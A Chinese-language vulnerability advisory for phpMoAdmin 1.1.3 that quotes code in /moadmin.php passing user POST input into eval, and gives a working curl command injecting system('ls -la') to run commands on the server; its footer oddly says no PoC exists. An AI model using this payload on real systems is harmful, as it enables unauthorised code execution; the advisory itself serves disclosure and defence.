phpMoAdmin 1.1.3 /moadmin.php 代码执行漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

<ul><li>/moadmin.php</li></ul><pre class=""> /** * Saves an object * * @param string $collection * @param string $obj * @return array */ public function saveObject($collection, $obj) { eval('$obj=' . $obj . ';'); //cast from string to array return $this-&gt;mongo-&gt;selectCollection($collection)-&gt;save($obj); } …. $action = (isset($_GET['action']) ? $_GET['action'] : 'listCollections'); if (isset($_POST['object'])) { if (self::$model-&gt;saveObject($_GET['collection'], $_POST['object'])) { return $this-&gt;_dumpFormVals(); } else { $action = 'editObject'; $_POST['errors']['object'] = 'Error: object could not be saved - check your array syntax.'; } </pre><p>saveObject 直接将用户传入的object带入eval执行,造成任意代码执行漏洞。<br></p><p>使用命令,在目标服务器上执行ls命令:</p><pre class="">curl http://hatsuyuki.sakura/moadmin/moadmin.php -d "object=1;system('ls -la');exit"</pre><p>得到回显:</p><p>&nbsp;</p><p><img alt="1D2529FE-66D1-47B1-ABF6-3FEFDD82586D.png"...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息